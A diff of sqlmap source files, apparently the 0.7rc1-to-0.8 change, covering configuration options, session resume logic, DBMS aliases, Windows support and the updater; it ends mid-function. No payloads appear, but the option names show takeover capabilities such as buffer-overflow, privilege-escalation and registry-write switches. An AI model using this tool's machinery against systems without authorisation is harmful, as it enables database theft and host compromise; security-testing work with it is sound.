-    kb.dbmsVersion    = []
+    kb.dbmsVersion    = [ "Unknown" ]
 
     kb.dep            = None
     kb.docRoot        = None
@@ -823,7 +995,7 @@ def __setKnowledgeBaseAttributes():
     kb.injType        = None
 
     # Back-end DBMS underlying operating system fingerprint via banner (-b)
-    # parsing or when knowing the OS is mandatory (i.g. dealing with DEP)
+    # parsing
     kb.os             = None
     kb.osVersion      = None
     kb.osSP           = None
@@ -837,7 +1009,6 @@ def __setKnowledgeBaseAttributes():
     kb.unionCount     = None
     kb.unionPosition  = None
 
-
 def __saveCmdline():
     """
     Saves the command line options on a sqlmap configuration INI file
@@ -867,7 +1038,7 @@ def __saveCmdline():
         optionData.sort()
 
         for option, value, datatype in optionData:
-            if value == None:
+            if value is None:
                 if datatype == "boolean":
                     value = "False"
                 elif datatype in ( "integer", "float" ):
@@ -891,22 +1062,21 @@ def __saveCmdline():
     infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
     logger.info(infoMsg)
 
-
 def __setVerbosity():
     """
     This function set the verbosity of sqlmap output messages.
     """
 
-    if conf.verbose == None:
+    if conf.verbose is None:
         conf.verbose = 1
 
     conf.verbose = int(conf.verbose)
 
     if conf.verbose == 1:
         logger.setLevel(logging.INFO)
-    elif conf.verbose > 1 and conf.eta:
-        conf.verbose = 1
-        logger.setLevel(logging.INFO)
+    elif conf.verbose > 2 and conf.eta:
+        conf.verbose = 2
+        logger.setLevel(logging.DEBUG)
     elif conf.verbose == 2:
         logger.setLevel(logging.DEBUG)
     elif conf.verbose == 3:
@@ -914,7 +1084,6 @@ def __setVerbosity():
     elif conf.verbose >= 4:
         logger.setLevel(8)
 
-
 def __mergeOptions(inputOptions):
     """
     Merge command line options with configuration file options.
@@ -926,10 +1095,14 @@ def __mergeOptions(inputOptions):
     if inputOptions.configFile:
         configFileParser(inputOptions.configFile)
 
-    for key, value in inputOptions.__dict__.items():
-        if not conf.has_key(key) or conf[key] == None or value != None:
-            conf[key] = value
+    if hasattr(inputOptions, "items"):
+        inputOptionsItems = inputOptions.items()
+    else:
+        inputOptionsItems = inputOptions.__dict__.items()
 
+    for key, value in inputOptionsItems:
+        if not conf.has_key(key) or conf[key] is None or value is not None:
+            conf[key] = value
 
 def init(inputOptions=advancedDict()):
     """
@@ -943,6 +1116,11 @@ def init(inputOptions=advancedDict()):
     __setConfAttributes()
     __setKnowledgeBaseAttributes()
     __cleanupOptions()
+
+    __setRequestFromFile()
+    
+    parseTargetUrl()
+
     __setHTTPTimeout()
     __setHTTPCookies()
     __setHTTPReferer()

lib/core/optiondict.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,30 +22,36 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 optDict = {
             # Family:        { "parameter_name":    "parameter_datatype" },
             "Target":        {
                                "url":               "string",
                                "list":              "string",
+                               "requestFile":       "string",
                                "googleDork":        "string",
+                               "configFile":        "string"
                              },
 
             "Request":       {
                                "method":            "string",
                                "data":              "string",
                                "cookie":            "string",
+                               "cookieUrlencode":   "boolean",
+                               "dropSetCookie":     "boolean",
                                "referer":           "string",
                                "agent":             "string",
                                "userAgentsFile":    "string",
                                "headers":           "string",
                                "aType":             "string",
                                "aCred":             "string",
+                               "aCert":             "string",
                                "proxy":             "string",
+                               "ignoreProxy":       "boolean",
                                "threads":           "integer",
                                "delay":             "float",
                                "timeout":           "float",
+                               "retries":           "integer",
+                               "scope":             "string"
                              },
 
             "Injection":     {
@@ -63,13 +69,14 @@ optDict = {
             "Techniques":    {
                                "stackedTest":       "boolean",
                                "timeTest":          "boolean",
+                               "timeSec":           "integer",
                                "unionTest":         "boolean",
                                "uTech":             "string",
-                               "unionUse":          "boolean",
+                               "unionUse":          "boolean"
                              },
 
             "Fingerprint":   {
-                               "extensiveFp":       "boolean",
+                               "extensiveFp":       "boolean"
                              },
 
             "Enumeration":   {
@@ -92,14 +99,21 @@ optDict = {
                                "excludeSysDbs":     "boolean",
                                "limitStart":        "integer",
                                "limitStop":         "integer",
+                               "firstChar":         "integer",
+                               "lastChar":          "integer",
                                "query":             "string",
-                               "sqlShell":          "boolean",
+                               "sqlShell":          "boolean"
+                             },
+
+            "User-defined function": {
+                               "udfInject":         "boolean",
+                               "shLib":             "string"
                              },
 
             "File system":   {
                                "rFile":             "string",
                                "wFile":             "string",
-                               "dFile":             "string",
+                               "dFile":             "string"
                              },
 
             "Takeover":      {
@@ -110,15 +124,27 @@ optDict = {
                                "osBof":             "boolean",
                                "privEsc":           "boolean",
                                "msfPath":           "string",
-                               "tmpPath":           "string",
+                               "tmpPath":           "string"
+                             },
+
+            "Windows":       {
+                               "regRead":           "boolean",
+                               "regAdd":            "boolean",
+                               "regDel":            "boolean",
+                               "regKey":            "string",
+                               "regVal":            "string",
+                               "regData":           "string",
+                               "regType":           "string"
                              },
 
             "Miscellaneous": {
-                               "eta":               "boolean",
-                               "verbose":           "integer",
-                               "updateAll":         "boolean",
                                "sessionFile":       "string",
+                               "flushSession":      "boolean",
+                               "eta":               "boolean",
+                               "googlePage":        "integer",
+                               "updateAll":         "boolean",
                                "batch":             "boolean",
                                "cleanup":           "boolean",
+                               "verbose":           "integer"
                              },
           }

lib/core/progress.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,27 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.common import dataToStdout
-
+from lib.core.data import conf
 
 class ProgressBar:
     """
     This class defines methods to update and draw a progress bar
     """
 
-    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
+    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
         self.__progBar = "[]"
         self.__oldProgBar = ""
         self.__min = int(minValue)
         self.__max = int(maxValue)
         self.__span = self.__max - self.__min
-        self.__width = totalWidth
+        self.__width = totalWidth if totalWidth else conf.progressWidth
         self.__amount = 0
         self.update()
 
-
     def __convertSeconds(self, value):
         seconds = value
         minutes = seconds / 60
@@ -50,7 +47,6 @@ class ProgressBar:
 
         return "%.2d:%.2d" % (minutes, seconds)
 
-
     def update(self, newAmount=0):
         """
         This method updates the progress bar
@@ -87,7 +83,6 @@ class ProgressBar:
         percentString = str(percentDone) + "%"
         self.__progBar = "%s %s" % (percentString, self.__progBar)
 
-
     def draw(self, eta=0):
         """
         This method draws the progress bar if it has changed
@@ -102,7 +97,6 @@ class ProgressBar:
                 blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max)))
                 dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank))
 
-
     def __str__(self):
         """
         This method returns the progress bar string

lib/core/readlineng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,14 +27,12 @@ In addition to normal readline stuff, this module provides haveReadline
 boolean and _outputfile variable used in genutils.
 """
 
-
-
 import sys
 
 from lib.core.data import logger
+from lib.core.settings import IS_WIN
 from lib.core.settings import PLATFORM
 
-
 try:
     from readline import *
     import readline as _rl
@@ -49,7 +47,7 @@ except ImportError:
     except ImportError:    
         haveReadline = False
 
-if 'win' in PLATFORM and haveReadline:
+if IS_WIN and haveReadline:
     try:
         _outputfile=_rl.GetOutputFile()
     except AttributeError:
@@ -78,7 +76,6 @@ if PLATFORM == 'darwin' and haveReadline:
 
         uses_libedit = True
 
-
 # the clear_history() function was only introduced in Python 2.4 and is
 # actually optional in the readline API, so we must explicitly check for its
 # existence.  Some known platforms actually don't have it.  This thread:

lib/core/session.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from lib.core.common import dataToSessionFile
@@ -34,7 +32,8 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
-
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES
 
 def setString():
     """
@@ -49,7 +48,6 @@ def setString():
     if condition:
         dataToSessionFile("[%s][None][None][String][%s]\n" % (conf.url, conf.string))
 
-
 def setRegexp():
     """
     Save regular expression to match in session file.
@@ -63,7 +61,6 @@ def setRegexp():
     if condition:
         dataToSessionFile("[%s][None][None][Regular expression][%s]\n" % (conf.url, conf.regexp))
 
-
 def setMatchRatio():
     condition = (
                   not kb.resumedQueries
@@ -74,7 +71,6 @@ def setMatchRatio():
     if condition:
         dataToSessionFile("[%s][None][None][Match ratio][%s]\n" % (conf.url, conf.matchRatio))
 
-
 def setInjection():
     """
     Save information retrieved about injection place and parameter in the
@@ -98,7 +94,6 @@ def setInjection():
         dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injParameter))
         dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injType))
 
-
 def setParenthesis(parenthesisCount):
     """
     @param parenthesisCount: number of parenthesis to be set into the
@@ -116,7 +111,6 @@ def setParenthesis(parenthesisCount):
 
     kb.parenthesis = parenthesisCount
 
-
 def setDbms(dbms):
     """
     @param dbms: database management system to be set into the knowledge
@@ -133,8 +127,10 @@ def setDbms(dbms):
     if condition:
         dataToSessionFile("[%s][%s][%s][DBMS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], dbms))
 
-    firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                               "|".join([alias for alias in MYSQL_ALIASES]))
+    firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                     "|".join([alias for alias in MYSQL_ALIASES]),
+                                     "|".join([alias for alias in PGSQL_ALIASES]),
+                                     "|".join([alias for alias in ORACLE_ALIASES]))
     dbmsRegExp = re.search("^%s" % firstRegExp, dbms, re.I)
 
     if dbmsRegExp:
@@ -144,7 +140,6 @@ def setDbms(dbms):
 
     logger.info("the back-end DBMS is %s" % kb.dbms)
 
-
 def setOs():
     """
     Example of kb.bannerFp dictionary:
@@ -183,7 +178,7 @@ def setOs():
     elif "sp" not in kb.bannerFp and kb.os == "Windows":
         kb.osSP = 0
 
-    if kb.os and kb.osVersion:
+    if kb.os and kb.osVersion and kb.osSP:
         infoMsg += " Service Pack %d" % kb.osSP
 
     if infoMsg:
@@ -192,7 +187,6 @@ def setOs():
     if condition:
         dataToSessionFile("[%s][%s][%s][OS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.os))
 
-
 def setStacked():
     condition = (
                   not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
@@ -205,7 +199,6 @@ def setStacked():
     if condition:
         dataToSessionFile("[%s][%s][%s][Stacked queries][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.stackedTest))
 
-
 def setUnion(comment=None, count=None, position=None):
     """
     @param comment: union comment to save in session file
@@ -245,7 +238,6 @@ def setUnion(comment=None, count=None, position=None):
 
         kb.unionPosition = position
 
-
 def setRemoteTempPath():
     condition = (
                   not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
@@ -255,18 +247,6 @@ def setRemoteTempPath():
     if condition:
         dataToSessionFile("[%s][%s][%s][Remote temp path][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], conf.tmpPath))
 
-
-def setDEP():
-    condition = (
-                  not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
-                  not kb.resumedQueries[conf.url].has_key("DEP") )
-                )
-
-    if condition:
-        dataToSessionFile("[%s][%s][%s][DEP][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.dep))
-
-
-
 def resumeConfKb(expression, url, value):
     if expression == "String" and url == conf.url:
         string = value[:-1]
@@ -369,19 +349,22 @@ def resumeConfKb(expression, url, value):
 
     elif expression == "DBMS" and url == conf.url:
         dbms        = value[:-1]
+        dbms        = dbms.lower()
+        dbmsVersion = None
 
         logMsg  = "resuming back-end DBMS '%s' " % dbms
         logMsg += "from session file"
         logger.info(logMsg)
 
-        dbms = dbms.lower()
-        firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                                   "|".join([alias for alias in MYSQL_ALIASES]))
+        firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                         "|".join([alias for alias in MYSQL_ALIASES]),
+                                         "|".join([alias for alias in PGSQL_ALIASES]),
+                                         "|".join([alias for alias in ORACLE_ALIASES]))
         dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, dbms)
 
         if dbmsRegExp:
             dbms        = dbmsRegExp.group(1)
-            kb.dbmsVersion = [ dbmsRegExp.group(2) ]
+            dbmsVersion = [ dbmsRegExp.group(2) ]
 
         if conf.dbms and conf.dbms.lower() != dbms:
             message  = "you provided '%s' as back-end DBMS, " % conf.dbms
@@ -393,8 +376,10 @@ def resumeConfKb(expression, url, value):
 
             if not test or test[0] in ("n", "N"):
                 conf.dbms      = dbms
+                kb.dbmsVersion = dbmsVersion
         else:
             conf.dbms      = dbms
+            kb.dbmsVersion = dbmsVersion
 
     elif expression == "OS" and url == conf.url:
         os = value[:-1]
@@ -451,10 +436,3 @@ def resumeConfKb(expression, url, value):
         logMsg  = "resuming remote absolute path of temporary "
         logMsg += "files directory '%s' from session file" % conf.tmpPath
         logger.info(logMsg)
-
-    elif expression == "DEP" and url == conf.url:
-        kb.dep = value[:-1]
-
-        logMsg  = "resuming DEP system policy value '%s' " % kb.dep
-        logMsg += "from session file"
-        logger.info(logMsg)

lib/core/settings.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,16 +22,14 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import logging
-import os
+import subprocess
 import sys
 
-
 # sqlmap version and site
-VERSION            = "0.7rc1"
+VERSION            = "0.8"
 VERSION_STRING     = "sqlmap/%s" % VERSION
+DESCRIPTION        = "automatic SQL injection and database takeover tool"
 SITE               = "http://sqlmap.sourceforge.net"
 
 # sqlmap logger
@@ -47,20 +45,17 @@ LOGGER.addHandler(LOGGER_HANDLER)
 LOGGER.setLevel(logging.WARN)
 
 # System variables
+IS_WIN             = subprocess.mswindows
 PLATFORM           = sys.platform.lower()
 PYVERSION          = sys.version.split()[0]
 
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
 
-# Urls to update sqlmap from
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
-SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-
 # Database managemen system specific variables
 MSSQL_SYSTEM_DBS   = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
 MYSQL_SYSTEM_DBS   = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"
-PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog" )
+PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog", "pg_toast" )
 ORACLE_SYSTEM_DBS  = ( "SYSTEM", "SYSAUX" )                              # These are TABLESPACE_NAME
 
 MSSQL_ALIASES      = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
@@ -76,6 +71,7 @@ SQL_STATEMENTS     = {
                              "select ",
                              "show ",
                              " top ",
+                             " distinct ",
                              " from ",
                              " from dual",
                              " where ",

lib/core/shell.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import atexit
 import os
 import rlcompleter
@@ -33,19 +31,16 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.core.data import queries
 
-
 def saveHistory():
     historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
     readline.write_history_file(historyPath)
 
-
 def loadHistory():
     historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
 
     if os.path.exists(historyPath):
         readline.read_history_file(historyPath)
 
-
 def queriesForAutoCompletion():
     autoComplQueries = {}
 
@@ -61,7 +56,6 @@ def queriesForAutoCompletion():
 
     return autoComplQueries
 
-
 class CompleterNG(rlcompleter.Completer):
     def global_matches(self, text):
         """
@@ -73,14 +67,13 @@ class CompleterNG(rlcompleter.Completer):
         matches = []
         n = len(text)
 
-        for list in [ self.namespace ]:
-            for word in list:
+        for ns in [ self.namespace ]:
+            for word in ns:
                 if word[:n] == text:
                     matches.append(word)
 
         return matches
 
-
 def autoCompletion(sqlShell=False, osShell=False):
     # First of all we check if the readline is available, by default
     # it is not in Python default installation on Windows

lib/core/subprocessng.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,21 +22,21 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
-import fcntl
 import errno
 import os
 import sys
 import time
 
+from lib.core.settings import IS_WIN
 
-if (sys.hexversion >> 16) >= 0x202:
+if not IS_WIN:
+    import fcntl
+
+    if (sys.hexversion >> 16) >= 0x202:
         FCNTL = fcntl
-else:
+    else:
         import FCNTL
 
-
 def blockingReadFromFD(fd):
     # Quick twist around original Twisted function
     # Blocking read from a non-blocking file descriptor
@@ -60,7 +60,6 @@ def blockingReadFromFD(fd):
 
     return output
 
-
 def blockingWriteToFD(fd, data):
     # Another quick twist
     while True:
@@ -78,12 +77,12 @@ def blockingWriteToFD(fd, data):
 
         break
 
-
 def setNonBlocking(fd):
     """
     Make a file descriptor non-blocking
     """
 
+    if IS_WIN is not True:
         flags = fcntl.fcntl(fd, FCNTL.F_GETFL)
         flags = flags | os.O_NONBLOCK
         fcntl.fcntl(fd, FCNTL.F_SETFL, flags)

lib/core/target.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,17 +22,11 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
-import re
 import time
 
 from lib.core.common import dataToSessionFile
 from lib.core.common import paramToDict
-from lib.core.common import parseTargetUrl
-from lib.core.common import readInput
-from lib.core.convert import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -43,7 +37,6 @@ from lib.core.exception import sqlmapGenericException
 from lib.core.exception import sqlmapSyntaxException
 from lib.core.session import resumeConfKb
 
-
 def __setRequestParams():
     """
     Check and set the parameters and perform checks on 'data' option for
@@ -67,21 +60,19 @@ def __setRequestParams():
         raise sqlmapSyntaxException, errMsg
 
     if conf.data:
-        urlDecodedData = urldecode(conf.data).replace("%", "%%")
-        conf.parameters["POST"] = urlDecodedData
-        __paramDict = paramToDict("POST", urlDecodedData)
+        conf.parameters["POST"] = conf.data
+        __paramDict = paramToDict("POST", conf.data)
 
         if __paramDict:
             conf.paramDict["POST"] = __paramDict
             __testableParameters = True
 
+        conf.method = "POST"
+
     # Perform checks on Cookie parameters
     if conf.cookie:
-        # TODO: sure about decoding the cookie?
-        #urlDecodedCookie = urldecode(conf.cookie).replace("%", "%%")
-        urlDecodedCookie = conf.cookie.replace("%", "%%")
-        conf.parameters["Cookie"] = urlDecodedCookie
-        __paramDict = paramToDict("Cookie", urlDecodedCookie)
+        conf.parameters["Cookie"] = conf.cookie
+        __paramDict = paramToDict("Cookie", conf.cookie)
 
         if __paramDict:
             conf.paramDict["Cookie"] = __paramDict
@@ -91,7 +82,8 @@ def __setRequestParams():
     if conf.httpHeaders:
         for httpHeader, headerValue in conf.httpHeaders:
             if httpHeader == "User-Agent":
-                conf.parameters["User-Agent"] = urldecode(headerValue).replace("%", "%%")
+                # No need for url encoding/decoding the user agent
+                conf.parameters["User-Agent"] = headerValue
 
                 condition  = not conf.testParameter
                 condition |= "User-Agent" in conf.testParameter
@@ -113,13 +105,18 @@ def __setRequestParams():
         errMsg += "within the GET, POST and Cookie parameters"
         raise sqlmapGenericException, errMsg
 
-
 def __setOutputResume():
     """
     Check and set the output text file and the resume functionality.
     """
 
-    if conf.sessionFile and os.path.exists(conf.sessionFile):
+    if not conf.sessionFile:
+        conf.sessionFile = "%s%ssession" % (conf.outputPath, os.sep)
+
+    logger.info("using '%s' as session file" % conf.sessionFile)
+
+    if os.path.exists(conf.sessionFile):
+        if not conf.flushSession:
             readSessionFP = open(conf.sessionFile, "r")
             lines = readSessionFP.readlines()
     
@@ -156,8 +153,14 @@ def __setOutputResume():
                         kb.resumedQueries[url][expression] = value
     
             readSessionFP.close()
+        else:
+            try:
+                os.remove(conf.sessionFile)
+                logger.info("flushing session file")
+            except OSError, msg:
+                errMsg = "unable to flush the session file (%s)" % msg
+                raise sqlmapFilePathException, errMsg
 
-    if conf.sessionFile:
     try:
         conf.sessionFP = open(conf.sessionFile, "a")
         dataToSessionFile("\n[%s]\n" % time.strftime("%X %x"))
@@ -165,7 +168,6 @@ def __setOutputResume():
         errMsg = "unable to write on the session file specified"
         raise sqlmapFilePathException, errMsg
 
-
 def __createFilesDir():
     """
     Create the file directory.
@@ -179,7 +181,6 @@ def __createFilesDir():
     if not os.path.isdir(conf.filePath):
         os.makedirs(conf.filePath, 0755)
 
-
 def __createDumpDir():
     """
     Create the dump directory.
@@ -193,6 +194,23 @@ def __createDumpDir():
     if not os.path.isdir(conf.dumpPath):
         os.makedirs(conf.dumpPath, 0755)
 
+def createTargetDirs():
+    """
+    Create the output directory.
+    """
+
+    conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname)
+
+    if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
+        os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
+
+    if not os.path.isdir(conf.outputPath):
+        os.makedirs(conf.outputPath, 0755)
+
+    dumper.setOutputFile()
+
+    __createDumpDir()
+    __createFilesDir()
 
 def initTargetEnv():
     """
@@ -213,25 +231,5 @@ def initTargetEnv():
         kb.unionCount     = None
         kb.unionPosition  = None
 
-    parseTargetUrl()
     __setRequestParams()
     __setOutputResume()
-
-
-def createTargetDirs():
-    """
-    Create the output directory.
-    """
-
-    conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname)
-
-    if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
-        os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
-
-    if not os.path.isdir(conf.outputPath):
-        os.makedirs(conf.outputPath, 0755)
-
-    dumper.setOutputFile()
-
-    __createDumpDir()
-    __createFilesDir()

lib/core/unescaper.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,19 +22,14 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 class Unescaper:
     def __init__(self):
         self.__unescaper = None
 
-
     def setUnescape(self, unescapeFunction):
         self.__unescaper = unescapeFunction
 
-
     def unescape(self, expression, quote=True):
         return self.__unescaper(expression, quote=quote)
 
-
 unescaper = Unescaper()

lib/core/update.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,20 +22,24 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import difflib
 import os
 import re
 import shutil
 import sys
 import tempfile
+import time
 import urlparse
 import zipfile
 
 from distutils.dir_util import mkpath
 from xml.dom.minidom import Document
 
+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import pollProcess
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
@@ -43,12 +47,9 @@ from lib.core.data import paths
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.settings import MSSQL_VERSIONS_URL
-from lib.core.settings import SQLMAP_VERSION_URL
-from lib.core.settings import SQLMAP_SOURCE_URL
 from lib.core.settings import VERSION
 from lib.request.connect import Connect as Request
 
-
 def __updateMSSQLXML():
     infoMsg = "updating Microsoft SQL Server XML versions file"
     logger.info(infoMsg)
@@ -109,12 +110,15 @@ def __updateMSSQLXML():
                 servicePack = servicePack[:servicePack.index("-")]
             if "*" in servicePack:
                 servicePack = servicePack[:servicePack.index("*")]
+            if servicePack.startswith("+"):
+                servicePack = "0%s" % servicePack
 
             servicePack = servicePack.replace("\t", " ")
             servicePack = servicePack.replace("  ", " ")
             servicePack = servicePack.replace("No SP", "0")
             servicePack = servicePack.replace("RTM", "0")
             servicePack = servicePack.replace("SP", "")
+            servicePack = servicePack.replace("Service Pack", "")
             servicePack = servicePack.replace("<a href=\"http:", "")
 
             if servicePack.endswith(" "):
@@ -196,141 +200,59 @@ def __updateMSSQLXML():
         infoMsg += "last update"
         logger.info(infoMsg)
 
-
-def __createFile(pathname, data):
-    mkpath(os.path.dirname(pathname))
-
-    fileFP = open(pathname, "wb")
-    fileFP.write(data)
-    fileFP.close()
-
-
-def __extractZipFile(tempDir, zipFile, sqlmapNewestVersion):
-    # Check if the saved binary file is really a ZIP file
-    if zipfile.is_zipfile(zipFile):
-        sqlmapZipFile = zipfile.ZipFile(zipFile)
-    else:
-        raise sqlmapFilePathException, "the downloaded file does not seem to be a ZIP file"
-
-    # Extract each file within the ZIP file in the temporary directory
-    for info in sqlmapZipFile.infolist():
-        if info.filename[-1] != '/':
-            data = sqlmapZipFile.read(info.filename)
-            __createFile(os.path.join(tempDir, info.filename), data)
-
-
 def __updateSqlmap():
-    infoMsg = "updating sqlmap"
-    logger.info(infoMsg)
+    rootDir = paths.SQLMAP_ROOT_PATH
 
-    debugMsg = "checking if a new version is available"
-    logger.debug(debugMsg)
+    infoMsg = "updating sqlmap to latest development version from the "
